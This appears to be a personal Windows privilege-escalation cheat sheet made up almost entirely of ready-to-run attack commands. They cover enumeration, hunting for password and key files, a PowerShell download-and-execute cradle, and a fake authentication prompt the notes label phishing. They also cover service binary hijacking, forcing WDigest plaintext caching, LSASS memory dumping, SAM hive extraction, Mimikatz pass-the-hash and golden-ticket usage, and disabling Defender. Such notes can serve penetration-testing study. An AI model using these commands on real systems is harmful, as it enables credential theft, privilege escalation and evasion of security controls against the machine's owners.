3 - Windows Privesc

Privesc

> Local Enum

net localgroup Users
net localgroup Administrators

whoami
whoami /all
net users
net accounts

dir env: = enum envinroment variables

wmic bios 
wmic volume

> network 

ipconfig /all
route print
arp -A
netstat -ano
net share
net use
wmic netuse list full
netsh firewall show state
netsh firewall show config

cmd /c “dir /b /a /s c:\ > C:\Users\dir.txt”

then we can:
type dir.txt | findstr /i passw
type dir.txt | findstr /i ssh
type dir.txt | findstr /i kdbx //keePass Files database
type dir.txt | findstr /i vnc

other files:
unattend.xml or Unattended.xml
sysprep.inf or sysprep.xml
web.config
.bak, .log, .cnf, .conf, .ini, .xml, .txt, .gpg, .pgp, id_rsa, id_dsa, .ovpn, .rdp, vnc, ssh

> credential manager

cmdkey /list
runas /savecred /user:<user> cmd.exe

dump credentials:

iex (New-Object System.Net.WebClient).DownloadString("<link>");Enum-Creds or Get-VaultCredential

github dumpCredStore

github Get-VaultCredential

• Ask for the password for the user logged on the same machine (phishing attempt)

$cred =$host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName);$cred.getnetworkcredential().password

$cred =$host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\admin',[Environment]::UserDomainName);$cred.getnetworkcredential().password

SessionGopher:

find saved sessions of Putty, WinSCP, SuperPutty, FileZilla, RDP 

Common Vulnerabilities

- unquoted path
- weak file permissions - accessChk -uwcqv <user> *
→ sc config <service> binPath= <exe file>

- powerup
- jaws
- win suggestion

LSASS

Set the key ‘UseLogonCredential’ to 1:
C:\ red add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

PS > C:\rundll32.exe User32.dll,LockWorkStation

extract lsass:

1. task manager > lsass.exe > create dump file > save the dump
2. procdump: 
  a) -ma = dump all the memory
  b) -r = generate a clone of the process before the dump
  c) .\procdump64 -accepteula -r -ma lsass.exe lsass
3. comsvcs.dll : rundll32 C:\Windows\System32\comsvcs.dll MiniDump <lsass PID> lsass_comsvcs.dmp full
4. Out-Minidump: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1
  a) . .\Out-Minidump.ps1
  b) Get-Process lsass | Out-Minidump

REGISTER

requires admin priv

extract register (sam, security, system):

1. reg save hklm\sam .\sam
2. reg save hklm\security .\security
3. reg save hklm\system .\system
4. python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam -system system local

Mimikatz

Privilege::debug # Obtain debugging rights
Token::elevate # Impersonate a token - SYSTEM or DA (Domain Admin)
Sekurlsa::LogonPassword # Extract credentials
Sekurlsa::pth # Perform Pass-the-Hash for command execution
Lsadump::SAM # Decrypt credentials from the registry
Kerberos::ptt # Perform pass-the-ticket by injecting into memory for later use
Kerberos::Golden # Create Golden/Silver tickets
sekurlsa::lsa /patch and /inject

example:

mimikatz.exe “privilege::debug” “sekurlsa::minidump <dump file> ”sekurlsa::logonpasswords" exit
Invoke-Mimikatz

Variations:

Github SafetyKatz

Github pypyKatz

AMSI2

AMSITrigger - search for malicious strings

requires admin priv

disable defender:

Set-MpPreference -DisableRealtimeMonitoring $true